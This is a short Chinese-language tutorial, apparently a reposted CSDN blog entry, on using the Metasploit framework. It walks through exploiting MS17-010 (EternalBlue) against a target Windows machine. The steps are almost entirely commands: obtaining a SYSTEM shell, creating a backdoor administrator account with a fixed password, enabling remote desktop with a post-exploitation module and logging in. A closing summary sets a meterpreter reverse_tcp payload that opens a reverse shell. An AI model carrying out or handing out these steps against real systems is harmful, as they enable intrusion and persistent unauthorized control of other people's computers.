Metasploit framework
作者:互联网
工具:the Metasploit framework
1.启动命令:msfconsole
一些参数解释:
(1)exploit:是代表利用漏洞进行攻击动作的模块
(2)auciliary:负责执行信息收集、扫描、嗅探
(3)post:后渗透模块
2.搜索命令
(1)例如:search ms17-010(搜索ms17-010漏洞模块)
查看是否存在这个漏洞
命令:set rhosts 目标主机IP地址
3.以ms17-010的第三个模块为例(永恒之蓝)
命令:use 3(利用永恒之蓝模块)
命令:info(查看详细信息)
命令:show options(查看配置的详细信息)
4.set lhost 攻击机IP地址(kali攻击机IP地址)
配置完成以后使用run命令运行
5.攻击成功以后,得到shell视图,完成以后查看当前shell权限
命令:getuid (最高权限是system)
6.输入shell可以获得对方CMD的命令行shell
7.输入chcp 65001 修改编码格式为UTF-8编码
8.在目标主机上新建一个账户
命令:net user test2 123456 /add
9.将新建账户添加至管理员组
net localgroup administrators test2 /add
10.退出当前shell (exit)
11.开启对方的3389服务(远程桌面服务)
命令:run post/windows/manage/enable_rdp
12.目标连接
(1)徽标键(win)+R打开运行窗口
(2)输入mstsc命令打开连接窗口
(3)输入创建的账户和密码,进行登录
命令总结:
1.msfconsole:启动msf
2.search ms17-010:搜索某个漏洞模块(如MS17-010)
3.use+模块ID:使用这个模块,并进入这个模块视图下
4.info:查看该模块的相关介绍信息
5.set rhosts/lhost+IP:配置参数的值,其中rhosts代表目标IP,Lhost代表本机IP
6.run/exploit:运行模块
7.set payload windows/x64/meterpreter/reverse_tcp:
设定payload为meterpreter这种高级的shell,并设定为rverse_tcp反弹shell
8.show options:查看配置的参数
标签:Metasploit,shell,命令,010,framework,set,ms17,模块 来源: https://blog.csdn.net/qq_49091880/article/details/113249766